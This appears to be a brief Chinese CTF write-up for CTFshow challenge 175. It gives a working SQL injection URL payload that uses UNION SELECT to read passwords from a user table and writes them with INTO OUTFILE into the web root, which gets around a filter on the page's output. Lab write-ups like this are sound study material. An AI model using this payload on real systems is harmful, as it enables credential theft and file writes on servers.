CTFshow 175 into outfile ‘/var/www/html/1.txt‘

[x00-x7f] 匹配ASCII值从0-127的字符
0-127表示单字节字符,也就是:数字,英文字符,半角符号,以及某些控制字符。
限制了页面不能显示任何数据,

?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10

CTFshow 175 into outfile ‘/var/www/html/1.txt‘_第1张图片就跳到这里了,真的很神奇,所以说

select xxx from xxx into outfile '/var/www/html/1.txt'

这个句式太重要了,好神奇

你可能感兴趣的:(sql)